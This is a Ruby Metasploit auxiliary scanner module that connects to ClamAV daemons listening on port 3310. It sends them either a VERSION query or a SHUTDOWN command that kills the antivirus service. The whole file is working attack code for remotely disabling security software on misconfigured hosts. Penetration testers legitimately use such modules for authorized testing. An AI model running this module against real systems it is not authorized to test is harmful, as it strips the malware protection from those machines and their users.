require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize(info = {})
super (
update_info(
info,
'Name' => 'ClamAV Remote Command Transmitter' ,
'Description' => %q(
In certain configurations, ClamAV will bind to all addresses and listen for commands.
This module sends properly-formatted commands to the ClamAV daemon if it is in such a
configuration.
),
'Author' => [
'Alejandro Hdeza' ,
'bwatters-r7' ,
'wvu'
],
'License' => MSF_LICENSE ,
'References' => [
],
'DisclosureDate' => 'Jun 8 2016' ,
'Actions' => [
[ 'VERSION' , 'Description' => 'Get Version Information' ],
[ 'SHUTDOWN' , 'Description' => 'Kills ClamAV Daemon' ]
],
'DefaultAction' => 'VERSION'
)
)
register_options(
[
Opt:: RPORT ( 3310 )
], self . class
)
end
def run_host(_ip)
begin
connect
sock.put(action.name + "\n" )
print_good(sock.get_once)
rescue EOFError
print_good( 'Successfully shut down ClamAV Service' )
ensure
disconnect
end
end
end
|